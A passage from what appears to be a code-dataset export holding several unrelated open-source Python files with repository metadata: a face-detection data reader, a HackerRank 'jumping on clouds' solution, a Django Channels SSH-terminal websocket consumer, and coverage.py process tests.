idx = int(np.random.uniform(0, len(sampled_bbox)))
img, sampled_labels = image_util.crop_image(
img, bbox_labels, sampled_bbox[idx], img_width, img_height,
settings.resize_width, settings.resize_height,
settings.min_face_size)
img = Image.fromarray(img)
interp_mode = [
Image.BILINEAR, Image.HAMMING, Image.NEAREST, Image.BICUBIC,
Image.LANCZOS
]
interp_indx = np.random.randint(0, 5)
img = img.resize(
(settings.resize_width, settings.resize_height),
resample=interp_mode[interp_indx])
img = np.array(img)
if mode == 'train':
mirror = int(np.random.uniform(0, 2))
if mirror == 1:
img = img[:, ::-1, :]
for i in six.moves.xrange(len(sampled_labels)):
tmp = sampled_labels[i][1]
sampled_labels[i][1] = 1 - sampled_labels[i][3]
sampled_labels[i][3] = 1 - tmp
img = to_chw_bgr(img)
img = img.astype('float32')
img -= settings.img_mean
img = img * settings.scale
return img, sampled_labels
def load_file_list(input_txt):
with open(input_txt, 'r') as f_dir:
lines_input_txt = f_dir.readlines()
file_dict = {}
num_class = 0
for i in range(len(lines_input_txt)):
line_txt = lines_input_txt[i].strip('\n\t\r')
if '--' in line_txt:
if i != 0:
num_class += 1
file_dict[num_class] = []
file_dict[num_class].append(line_txt)
if '--' not in line_txt:
if len(line_txt) > 6:
split_str = line_txt.split(' ')
x1_min = float(split_str[0])
y1_min = float(split_str[1])
x2_max = float(split_str[2])
y2_max = float(split_str[3])
line_txt = str(x1_min) + ' ' + str(y1_min) + ' ' + str(
x2_max) + ' ' + str(y2_max)
file_dict[num_class].append(line_txt)
else:
file_dict[num_class].append(line_txt)
return list(file_dict.values())
def expand_bboxes(bboxes,
expand_left=2.,
expand_up=2.,
expand_right=2.,
expand_down=2.):
"""
Expand bboxes, expand 2 times by defalut.
"""
expand_boxes = []
for bbox in bboxes:
xmin = bbox[0]
ymin = bbox[1]
xmax = bbox[2]
ymax = bbox[3]
w = xmax - xmin
h = ymax - ymin
ex_xmin = max(xmin - w / expand_left, 0.)
ex_ymin = max(ymin - h / expand_up, 0.)
ex_xmax = min(xmax + w / expand_right, 1.)
ex_ymax = min(ymax + h / expand_down, 1.)
expand_boxes.append([ex_xmin, ex_ymin, ex_xmax, ex_ymax])
return expand_boxes
def train_generator(settings, file_list, batch_size, shuffle=True):
def reader():
if shuffle and 'ce_mode' not in os.environ:
np.random.shuffle(file_list)
batch_out = []
for item in file_list:
image_name = item[0]
image_path = os.path.join(settings.data_dir, image_name)
im = Image.open(image_path)
if im.mode == 'L':
im = im.convert('RGB')
im_width, im_height = im.size
# layout: label | xmin | ymin | xmax | ymax
bbox_labels = []
for index_box in range(len(item)):
if index_box >= 2:
bbox_sample = []
temp_info_box = item[index_box].split(' ')
xmin = float(temp_info_box[0])
ymin = float(temp_info_box[1])
w = float(temp_info_box[2])
h = float(temp_info_box[3])
# Filter out wrong labels
if w < 0 or h < 0:
continue
xmax = xmin + w
ymax = ymin + h
bbox_sample.append(1)
bbox_sample.append(float(xmin) / im_width)
bbox_sample.append(float(ymin) / im_height)
bbox_sample.append(float(xmax) / im_width)
bbox_sample.append(float(ymax) / im_height)
bbox_labels.append(bbox_sample)
im, sample_labels = preprocess(im, bbox_labels, "train", settings,
image_path)
sample_labels = np.array(sample_labels)
if len(sample_labels) == 0: continue
im = im.astype('float32')
face_box = sample_labels[:, 1:5]
head_box = expand_bboxes(face_box)
label = [1] * len(face_box)
batch_out.append((im, face_box, head_box, label))
if len(batch_out) == batch_size:
yield batch_out
batch_out = []
return reader
def train(settings,
file_list,
batch_size,
shuffle=True,
use_multiprocess=True,
num_workers=8):
file_lists = load_file_list(file_list)
if use_multiprocess:
n = int(math.ceil(len(file_lists) // num_workers))
split_lists = [
file_lists[i:i + n] for i in range(0, len(file_lists), n)
]
readers = []
for iterm in split_lists:
readers.append(
train_generator(settings, iterm, batch_size, shuffle))
return paddle.reader.multiprocess_reader(readers, False)
else:
return train_generator(settings, file_lists, batch_size, shuffle)
def test(settings, file_list):
file_lists = load_file_list(file_list)
def reader():
for image in file_lists:
image_name = image[0]
image_path = os.path.join(settings.data_dir, image_name)
im = Image.open(image_path)
if im.mode == 'L':
im = im.convert('RGB')
yield im, image_path
return reader
def infer(settings, image_path):
def batch_reader():
img = Image.open(image_path)
if img.mode == 'L':
img = img.convert('RGB')
im_width, im_height = img.size
if settings.resize_width and settings.resize_height:
img = img.resize((settings.resize_width, settings.resize_height),
Image.ANTIALIAS)
img = np.array(img)
img = to_chw_bgr(img)
img = img.astype('float32')
img -= settings.img_mean
img = img * settings.scale
return np.array([img])
return batch_reader
| 35.085546 | 79 | 0.552211 |
4a1e61b58e1cc25fec37e8b55deca9375084b422 | 1,299 | py | Python | solving/lists/clouds/clouds.py | williamlagos/chess | 7470479e352bf6fa28215e745af8c42dc20d7a1f | [
"MIT"
] | null | null | null | solving/lists/clouds/clouds.py | williamlagos/chess | 7470479e352bf6fa28215e745af8c42dc20d7a1f | [
"MIT"
] | 4 | 2020-04-23T23:17:54.000Z | 2021-07-06T17:44:45.000Z | solving/lists/clouds/clouds.py | williamlagos/chess | 7470479e352bf6fa28215e745af8c42dc20d7a1f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import math
import os
import random
import re
import sys
# Complete the jumpingOnClouds function below.
def jumpingOnClouds(c):
jumps = 0
# Constraints check
clouds_quantity = len(c)
if clouds_quantity < 2 or clouds_quantity > 100:
return jumps
if c[0] == 0 and c[-1:] == 0:
return jumps
ones = c.count(1)
zeroes = c.count(0)
clouds = ones + zeroes
if ones >= zeroes:
return jumps
if clouds != clouds_quantity:
return jumps
# Logical construction
i = 0
last = clouds - 1
while i < last:
# Checks the least adjacent
one_step = i + 1
two_step = i + 2
if two_step <= last and c[two_step] == 0:
jumps += 1
i += 2
# Checks for the nearer adjacent
elif one_step <= last and c[one_step] == 0:
jumps += 1
i += 1
# Ends the loop if any of these checks are invalid
else:
i = last
return jumps
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
# fptr = open('./output.txt', 'w')
n = int(input())
c = list(map(int, input().rstrip().split()))
result = jumpingOnClouds(c)
fptr.write(str(result) + '\n')
fptr.close()
| 23.196429 | 58 | 0.555812 |
4a1e62d375f8e57f33e2d021881a807aa2b7a7ba | 2,851 | py | Python | manage_app/consumers.py | radekska/django-network-controller | 6bcb847cbe1efa7dee118974de5e49b4f411e5da | [
"MIT"
] | null | null | null | manage_app/consumers.py | radekska/django-network-controller | 6bcb847cbe1efa7dee118974de5e49b4f411e5da | [
"MIT"
] | null | null | null | manage_app/consumers.py | radekska/django-network-controller | 6bcb847cbe1efa7dee118974de5e49b4f411e5da | [
"MIT"
] | null | null | null | import json
import logging
import asyncio
from django.contrib.auth.models import User
from asgiref.sync import sync_to_async
from channels.consumer import AsyncConsumer
from manage_app.backend.ConnectionHandler import SSHConnectionHandler
from config_app.models import ConfigParameters
from manage_app.models import DeviceModel
class SSHConsumer(AsyncConsumer):
"""
This class is inherits from AsyncConsumer class from channels.consumer module and it is responsible for handling all
asynchronous traffic coming from javascript frontend web socket as well as forwarding it further to Network Device. (xterm SSH web terminal)
"""
socket_opened = False
async def websocket_connect(self, event):
self.user = self.scope["user"]
logging.warning(f"Web socket opened - {event}.")
await self.send({
'type': 'websocket.accept',
})
self.device_model = await sync_to_async(DeviceModel.objects.get, thread_sensitive=True)(ssh_session=True)
self.device_id = self.device_model.id
self.user_model = await sync_to_async(User.objects.get, thread_sensitive=True)(
username=self.user)
self.access_config_model = await sync_to_async(ConfigParameters.objects.filter, thread_sensitive=True)(
access_config_id__isnull=False)
self.access_config_model = await sync_to_async(self.access_config_model.get, thread_sensitive=True)(
user=self.user_model)
self.access_config_id = self.access_config_model.access_config_id
initial_data = dict(response=f'\r\nOpening SSH session to {self.device_model.hostname}... \r\n')
await self.send({
'type': 'websocket.send',
'text': json.dumps(initial_data)
})
self.SSHConnection = await SSHConnectionHandler.initialize_connection(self.device_id, self.access_config_id)
data = await self.SSHConnection.read_from_connection(self.SSHConnection)
await asyncio.sleep(1)
await self.send({
'type': 'websocket.send',
'text': json.dumps(data),
})
async def websocket_receive(self, event):
command = event.get('text', None)
responded_lines, response_and_prompt = await asyncio.gather(
self.SSHConnection.write_to_connection(self.SSHConnection, command),
self.SSHConnection.read_from_connection(self.SSHConnection))
if response_and_prompt is not False:
await self.send({
'type': 'websocket.send',
'text': json.dumps(response_and_prompt)
})
async def websocket_disconnect(self, event):
self.device_model.ssh_session = False
await sync_to_async(self.device_model.save, thread_sensitive=True)()
logging.warning("connection closed", event)
| 37.513158 | 144 | 0.69765 |
4a1e63488537d4a13902eef2374eae9a66ed55ce | 59,334 | py | Python | tests/test_process.py | davidszotten/coveragepy | c09c2c203286db3cae1148bd02b1db9a9d524af1 | [
"Apache-2.0"
] | null | null | null | tests/test_process.py | davidszotten/coveragepy | c09c2c203286db3cae1148bd02b1db9a9d524af1 | [
"Apache-2.0"
] | null | null | null | tests/test_process.py | davidszotten/coveragepy | c09c2c203286db3cae1148bd02b1db9a9d524af1 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""Tests for process behavior of coverage.py."""
import distutils.sysconfig
import glob
import os
import os.path
import re
import sys
import textwrap
import time
from xml.etree import ElementTree
import pytest
import coverage
from coverage import env
from coverage.data import line_counts
from coverage.files import python_reported_file
from coverage.misc import output_encoding
from tests.coveragetest import CoverageTest
from tests.helpers import re_lines
class ProcessTest(CoverageTest):
"""Tests of the per-process behavior of coverage.py."""
def test_save_on_exit(self):
self.make_file("mycode.py", """\
h = "Hello"
w = "world"
""")
self.assert_doesnt_exist(".coverage")
self.run_command("coverage run mycode.py")
self.assert_exists(".coverage")
def test_environment(self):
# Checks that we can import modules from the tests directory at all!
self.make_file("mycode.py", """\
import covmod1
import covmodzip1
a = 1
print('done')
""")
self.assert_doesnt_exist(".coverage")
out = self.run_command("coverage run mycode.py")
self.assert_exists(".coverage")
self.assertEqual(out, 'done\n')
def make_b_or_c_py(self):
"""Create b_or_c.py, used in a few of these tests."""
# "b_or_c.py b" will run 6 lines.
# "b_or_c.py c" will run 7 lines.
# Together, they run 8 lines.
self.make_file("b_or_c.py", """\
import sys
a = 1
if sys.argv[1] == 'b':
b = 1
else:
c = 1
c2 = 2
d = 1
print('done')
""")
def test_combine_parallel_data(self):
self.make_b_or_c_py()
out = self.run_command("coverage run -p b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_file_count(".coverage.*", 1)
out = self.run_command("coverage run -p b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
# After two -p runs, there should be two .coverage.machine.123 files.
self.assert_file_count(".coverage.*", 2)
# Combine the parallel coverage data files into .coverage .
self.run_command("coverage combine")
self.assert_exists(".coverage")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
# Running combine again should fail, because there are no parallel data
# files to combine.
status, out = self.run_command_status("coverage combine")
self.assertEqual(status, 1)
self.assertEqual(out, "No data to combine\n")
# And the originally combined data is still there.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
def test_combine_parallel_data_with_a_corrupt_file(self):
self.make_b_or_c_py()
out = self.run_command("coverage run -p b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_file_count(".coverage.*", 1)
out = self.run_command("coverage run -p b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
# After two -p runs, there should be two .coverage.machine.123 files.
self.assert_file_count(".coverage.*", 2)
# Make a bogus data file.
self.make_file(".coverage.bad", "This isn't a coverage data file.")
# Combine the parallel coverage data files into .coverage .
out = self.run_command("coverage combine")
self.assert_exists(".coverage")
self.assert_exists(".coverage.bad")
warning_regex = (
r"(" # JSON message:
r"Coverage.py warning: Couldn't read data from '.*\.coverage\.bad': "
r"CoverageException: Doesn't seem to be a coverage\.py data file"
r"|" # SQL message:
r"Coverage.py warning: Couldn't use data file '.*\.coverage\.bad': "
r"file (is encrypted or )?is not a database"
r")"
)
self.assertRegex(out, warning_regex)
# After combining, those two should be the only data files.
self.assert_file_count(".coverage.*", 1)
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
def test_combine_no_usable_files(self):
# https://bitbucket.org/ned/coveragepy/issues/629/multiple-use-of-combine-leads-to-empty
self.make_b_or_c_py()
out = self.run_command("coverage run b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
# Make bogus data files.
self.make_file(".coverage.bad1", "This isn't a coverage data file.")
self.make_file(".coverage.bad2", "This isn't a coverage data file.")
# Combine the parallel coverage data files into .coverage, but nothing is readable.
status, out = self.run_command_status("coverage combine")
self.assertEqual(status, 1)
for n in "12":
self.assert_exists(".coverage.bad{}".format(n))
warning_regex = (
r"(" # JSON message:
r"Coverage.py warning: Couldn't read data from '.*\.coverage\.bad{0}': "
r"CoverageException: Doesn't seem to be a coverage\.py data file"
r"|" # SQL message:
r"Coverage.py warning: Couldn't use data file '.*\.coverage.bad{0}': "
r"file (is encrypted or )?is not a database"
r")"
.format(n)
)
self.assertRegex(out, warning_regex)
self.assertRegex(out, r"No usable data files")
# After combining, we should have a main file and two parallel files.
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 2)
# Read the coverage file and see that b_or_c.py has 6 lines
# executed (we only did b, not c).
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 6)
def test_combine_parallel_data_in_two_steps(self):
self.make_b_or_c_py()
out = self.run_command("coverage run -p b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_file_count(".coverage.*", 1)
# Combine the (one) parallel coverage data file into .coverage .
self.run_command("coverage combine")
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
out = self.run_command("coverage run -p b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 1)
# Combine the parallel coverage data files into .coverage .
self.run_command("coverage combine --append")
self.assert_exists(".coverage")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
def test_combine_parallel_data_no_append(self):
self.make_b_or_c_py()
out = self.run_command("coverage run -p b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_file_count(".coverage.*", 1)
# Combine the (one) parallel coverage data file into .coverage .
self.run_command("coverage combine")
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
out = self.run_command("coverage run -p b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 1)
# Combine the parallel coverage data files into .coverage, but don't
# use the data in .coverage already.
self.run_command("coverage combine")
self.assert_exists(".coverage")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has only 7 lines
# because we didn't keep the data from running b.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 7)
def test_append_data(self):
self.make_b_or_c_py()
out = self.run_command("coverage run b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
out = self.run_command("coverage run --append b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
def test_append_data_with_different_file(self):
self.make_b_or_c_py()
self.make_file(".coveragerc", """\
[run]
data_file = .mycovdata
""")
out = self.run_command("coverage run b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_exists(".mycovdata")
out = self.run_command("coverage run --append b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_exists(".mycovdata")
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData(".mycovdata")
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
def test_append_can_create_a_data_file(self):
self.make_b_or_c_py()
out = self.run_command("coverage run --append b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has only 6 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 6)
def test_combine_with_rc(self):
self.make_b_or_c_py()
self.make_file(".coveragerc", """\
[run]
source = .
parallel = true
""")
out = self.run_command("coverage run b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
out = self.run_command("coverage run b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
# After two runs, there should be two .coverage.machine.123 files.
self.assert_file_count(".coverage.*", 2)
# Combine the parallel coverage data files into .coverage .
self.run_command("coverage combine")
self.assert_exists(".coverage")
self.assert_exists(".coveragerc")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
# Reporting should still work even with the .rc file
out = self.run_command("coverage report")
self.assertMultiLineEqual(out, textwrap.dedent("""\
Name Stmts Miss Cover
-------------------------------
b_or_c.py 8 0 100%
"""))
def test_combine_with_aliases(self):
self.make_file("d1/x.py", """\
a = 1
b = 2
print("%s %s" % (a, b))
""")
self.make_file("d2/x.py", """\
# 1
# 2
# 3
c = 4
d = 5
print("%s %s" % (c, d))
""")
self.make_file(".coveragerc", """\
[run]
source = .
parallel = True
[paths]
source =
src
*/d1
*/d2
""")
out = self.run_command("coverage run " + os.path.normpath("d1/x.py"))
self.assertEqual(out, '1 2\n')
out = self.run_command("coverage run " + os.path.normpath("d2/x.py"))
self.assertEqual(out, '4 5\n')
self.assert_file_count(".coverage.*", 2)
self.run_command("coverage combine")
self.assert_exists(".coverage")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
# Read the coverage data file and see that the two different x.py
# files have been combined together.
data = coverage.CoverageData()
data.read()
summary = line_counts(data, fullpath=True)
self.assertEqual(len(summary), 1)
actual = os.path.normcase(os.path.abspath(list(summary.keys())[0]))
expected = os.path.normcase(os.path.abspath('src/x.py'))
self.assertEqual(expected, actual)
self.assertEqual(list(summary.values())[0], 6)
def test_erase_parallel(self):
self.make_file(".coveragerc", """\
[run]
data_file = data.dat
parallel = True
""")
self.make_file("data.dat")
self.make_file("data.dat.fooey")
self.make_file("data.dat.gooey")
self.make_file(".coverage")
self.run_command("coverage erase")
self.assert_doesnt_exist("data.dat")
self.assert_doesnt_exist("data.dat.fooey")
self.assert_doesnt_exist("data.dat.gooey")
self.assert_exists(".coverage")
def test_missing_source_file(self):
# Check what happens if the source is missing when reporting happens.
self.make_file("fleeting.py", """\
s = 'goodbye, cruel world!'
""")
self.run_command("coverage run fleeting.py")
os.remove("fleeting.py")
out = self.run_command("coverage html -d htmlcov")
self.assertRegex(out, "No source for code: '.*fleeting.py'")
self.assertNotIn("Traceback", out)
# It happens that the code paths are different for *.py and other
# files, so try again with no extension.
self.make_file("fleeting", """\
s = 'goodbye, cruel world!'
""")
self.run_command("coverage run fleeting")
os.remove("fleeting")
status, out = self.run_command_status("coverage html -d htmlcov")
self.assertRegex(out, "No source for code: '.*fleeting'")
self.assertNotIn("Traceback", out)
self.assertEqual(status, 1)
def test_running_missing_file(self):
status, out = self.run_command_status("coverage run xyzzy.py")
self.assertRegex(out, "No file to run: .*xyzzy.py")
self.assertNotIn("raceback", out)
self.assertNotIn("rror", out)
self.assertEqual(status, 1)
def test_code_throws(self):
self.make_file("throw.py", """\
def f1():
raise Exception("hey!")
def f2():
f1()
f2()
""")
# The important thing is for "coverage run" and "python" to report the
# same traceback.
status, out = self.run_command_status("coverage run throw.py")
out2 = self.run_command("python throw.py")
if env.PYPY:
# Pypy has an extra frame in the traceback for some reason
out2 = re_lines(out2, "toplevel", match=False)
self.assertMultiLineEqual(out, out2)
# But also make sure that the output is what we expect.
path = python_reported_file('throw.py')
msg = 'File "{}", line 5,? in f2'.format(re.escape(path))
self.assertRegex(out, msg)
self.assertIn('raise Exception("hey!")', out)
self.assertEqual(status, 1)
def test_code_exits(self):
self.make_file("exit.py", """\
import sys
def f1():
print("about to exit..")
sys.exit(17)
def f2():
f1()
f2()
""")
# The important thing is for "coverage run" and "python" to have the
# same output. No traceback.
status, out = self.run_command_status("coverage run exit.py")
status2, out2 = self.run_command_status("python exit.py")
self.assertMultiLineEqual(out, out2)
self.assertMultiLineEqual(out, "about to exit..\n")
self.assertEqual(status, status2)
self.assertEqual(status, 17)
def test_code_exits_no_arg(self):
self.make_file("exit_none.py", """\
import sys
def f1():
print("about to exit quietly..")
sys.exit()
f1()
""")
status, out = self.run_command_status("coverage run exit_none.py")
status2, out2 = self.run_command_status("python exit_none.py")
self.assertMultiLineEqual(out, out2)
self.assertMultiLineEqual(out, "about to exit quietly..\n")
self.assertEqual(status, status2)
self.assertEqual(status, 0)
def test_fork(self):
if not hasattr(os, 'fork'):
self.skipTest("Can't test os.fork since it doesn't exist.")
self.make_file("fork.py", """\
import os
def child():
print('Child!')
def main():
ret = os.fork()
if ret == 0:
child()
else:
os.waitpid(ret, 0)
main()
""")
out = self.run_command("coverage run -p fork.py")
self.assertEqual(out, 'Child!\n')
self.assert_doesnt_exist(".coverage")
# After running the forking program, there should be two
# .coverage.machine.123 files.
self.assert_file_count(".coverage.*", 2)
# The two data files should have different random numbers at the end of
# the file name.
data_files = glob.glob(".coverage.*")
nums = set(name.rpartition(".")[-1] for name in data_files)
self.assertEqual(len(nums), 2, "Same random: %s" % (data_files,))
# Combine the parallel coverage data files into .coverage .
self.run_command("coverage combine")
self.assert_exists(".coverage")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['fork.py'], 9)
def test_warnings_during_reporting(self):
# While fixing issue #224, the warnings were being printed far too
# often. Make sure they're not any more.
self.make_file("hello.py", """\
import sys, os, the_other
print("Hello")
""")
self.make_file("the_other.py", """\
print("What?")
""")
self.make_file(".coveragerc", """\
[run]
source =
.
xyzzy
""")
self.run_command("coverage run hello.py")
out = self.run_command("coverage html")
self.assertEqual(out.count("Module xyzzy was never imported."), 0)
def test_warns_if_never_run(self):
# Note: the name of the function can't have "warning" in it, or the
# absolute path of the file will have "warning" in it, and an assertion
# will fail.
out = self.run_command("coverage run i_dont_exist.py")
path = python_reported_file('i_dont_exist.py')
self.assertIn("No file to run: '{}'".format(path), out)
self.assertNotIn("warning", out)
self.assertNotIn("Exception", out)
out = self.run_command("coverage run -m no_such_module")
self.assertTrue(
("No module named no_such_module" in out) or
("No module named 'no_such_module'" in out)
)
self.assertNotIn("warning", out)
self.assertNotIn("Exception", out)
def test_warnings_trace_function_changed_with_threads(self):
# https://bitbucket.org/ned/coveragepy/issue/164
if env.METACOV:
self.skipTest("Can't test tracers changing during metacoverage")
self.make_file("bug164.py", """\
import threading
import time
class MyThread (threading.Thread):
def run(self):
print("Hello")
thr = MyThread()
thr.start()
thr.join()
""")
out = self.run_command("coverage run --timid bug164.py")
self.assertIn("Hello\n", out)
self.assertNotIn("warning", out)
def test_warning_trace_function_changed(self):
self.make_file("settrace.py", """\
import sys
print("Hello")
sys.settrace(None)
print("Goodbye")
""")
out = self.run_command("coverage run --timid settrace.py")
self.assertIn("Hello\n", out)
self.assertIn("Goodbye\n", out)
self.assertIn("Trace function changed", out)
def test_timid(self):
# Test that the --timid command line argument properly swaps the tracer
# function for a simpler one.
#
# This is complicated by the fact that the tests are run twice for each
# version: once with a compiled C-based trace function, and once without
# it, to also test the Python trace function. So this test has to examine
# an environment variable set in igor.py to know whether to expect to see
# the C trace function or not.
# When meta-coverage testing, this test doesn't work, because it finds
# coverage.py's own trace function.
if os.environ.get('COVERAGE_COVERAGE', ''):
self.skipTest("Can't test timid during coverage measurement.")
self.make_file("showtrace.py", """\
# Show the current frame's trace function, so that we can test what the
# command-line options do to the trace function used.
import sys
# Show what the trace function is. If a C-based function is used, then f_trace
# may be None.
trace_fn = sys._getframe(0).f_trace
if trace_fn is None:
trace_name = "None"
else:
# Get the name of the tracer class. Py3k has a different way to get it.
try:
trace_name = trace_fn.im_class.__name__
except AttributeError:
try:
trace_name = trace_fn.__self__.__class__.__name__
except AttributeError:
# A C-based function could also manifest as an f_trace value
# which doesn't have im_class or __self__.
trace_name = trace_fn.__class__.__name__
print(trace_name)
""")
# When running without coverage, no trace function
py_out = self.run_command("python showtrace.py")
self.assertEqual(py_out, "None\n")
cov_out = self.run_command("coverage run showtrace.py")
if os.environ.get('COVERAGE_TEST_TRACER', 'c') == 'c':
# If the C trace function is being tested, then regular running should have
# the C function, which registers itself as f_trace.
self.assertEqual(cov_out, "CTracer\n")
else:
# If the Python trace function is being tested, then regular running will
# also show the Python function.
self.assertEqual(cov_out, "PyTracer\n")
# When running timidly, the trace function is always Python.
timid_out = self.run_command("coverage run --timid showtrace.py")
self.assertEqual(timid_out, "PyTracer\n")
def test_warn_preimported(self):
self.make_file("hello.py", """\
import goodbye
import coverage
cov = coverage.Coverage(include=["good*"], check_preimported=True)
cov.start()
print(goodbye.f())
cov.stop()
""")
self.make_file("goodbye.py", """\
def f():
return "Goodbye!"
""")
goodbye_path = os.path.abspath("goodbye.py")
out = self.run_command("python hello.py")
self.assertIn("Goodbye!", out)
msg = (
"Coverage.py warning: "
"Already imported a file that will be measured: {0} "
"(already-imported)").format(goodbye_path)
self.assertIn(msg, out)
@pytest.mark.expensive
def test_fullcoverage(self): # pragma: no metacov
if env.PY2: # This doesn't work on Python 2.
self.skipTest("fullcoverage doesn't work on Python 2.")
# It only works with the C tracer, and if we aren't measuring ourselves.
if not env.C_TRACER or env.METACOV:
self.skipTest("fullcoverage only works with the C tracer.")
# fullcoverage is a trick to get stdlib modules measured from
# the very beginning of the process. Here we import os and
# then check how many lines are measured.
self.make_file("getenv.py", """\
import os
print("FOOEY == %s" % os.getenv("FOOEY"))
""")
fullcov = os.path.join(
os.path.dirname(coverage.__file__), "fullcoverage"
)
self.set_environ("FOOEY", "BOO")
self.set_environ("PYTHONPATH", fullcov)
out = self.run_command("python -m coverage run -L getenv.py")
self.assertEqual(out, "FOOEY == BOO\n")
data = coverage.CoverageData()
data.read()
# The actual number of executed lines in os.py when it's
# imported is 120 or so. Just running os.getenv executes
# about 5.
self.assertGreater(line_counts(data)['os.py'], 50)
def test_lang_c(self):
if env.JYTHON:
# Jython as of 2.7.1rc3 won't compile a filename that isn't utf8.
self.skipTest("Jython can't handle this test")
if env.PYPY and env.PY3 and env.PYPYVERSION[:3] >= (7, 1, 1): # pragma: obscure
# https://bitbucket.org/pypy/pypy/issues/3074/compile-fails-on-non-ascii-filename-if
self.skipTest("Avoid getfilesystemencoding problem on pypy3")
# LANG=C forces getfilesystemencoding on Linux to 'ascii', which causes
# failures with non-ascii file names. We don't want to make a real file
# with strange characters, though, because that gets the test runners
# tangled up. This will isolate the concerns to the coverage.py code.
# https://bitbucket.org/ned/coveragepy/issues/533/exception-on-unencodable-file-name
self.make_file("weird_file.py", r"""
globs = {}
code = "a = 1\nb = 2\n"
exec(compile(code, "wut\xe9\xea\xeb\xec\x01\x02.py", 'exec'), globs)
print(globs['a'])
print(globs['b'])
""")
self.set_environ("LANG", "C")
out = self.run_command("coverage run weird_file.py")
self.assertEqual(out, "1\n2\n")
def test_deprecation_warnings(self):
# Test that coverage doesn't trigger deprecation warnings.
# https://bitbucket.org/ned/coveragepy/issue/305/pendingdeprecationwarning-the-imp-module
self.make_file("allok.py", """\
import warnings
warnings.simplefilter('default')
import coverage
print("No warnings!")
""")
# Some of our testing infrastructure can issue warnings.
# Turn it all off for the sub-process.
self.del_environ("COVERAGE_TESTING")
out = self.run_command("python allok.py")
self.assertEqual(out, "No warnings!\n")
def test_run_twice(self):
# https://bitbucket.org/ned/coveragepy/issue/353/40a3-introduces-an-unexpected-third-case
self.make_file("foo.py", """\
def foo():
pass
""")
self.make_file("run_twice.py", """\
import sys
import coverage
for i in [1, 2]:
sys.stderr.write("Run %s\\n" % i)
inst = coverage.Coverage(source=['foo'])
inst.load()
inst.start()
import foo
inst.stop()
inst.save()
""")
out = self.run_command("python run_twice.py")
self.assertEqual(
out,
"Run 1\n"
"Run 2\n"
"Coverage.py warning: Module foo was previously imported, but not measured "
"(module-not-measured)\n"
)
def test_module_name(self):
# https://bitbucket.org/ned/coveragepy/issues/478/help-shows-silly-program-name-when-running
out = self.run_command("python -m coverage")
self.assertIn("Use 'coverage help' for help", out)
TRY_EXECFILE = os.path.join(os.path.dirname(__file__), "modules/process_test/try_execfile.py")
class EnvironmentTest(CoverageTest):
"""Tests using try_execfile.py to test the execution environment."""
def assert_tryexecfile_output(self, expected, actual):
"""Assert that the output we got is a successful run of try_execfile.py.
`expected` and `actual` must be the same, modulo a few slight known
platform differences.
"""
# First, is this even credible try_execfile.py output?
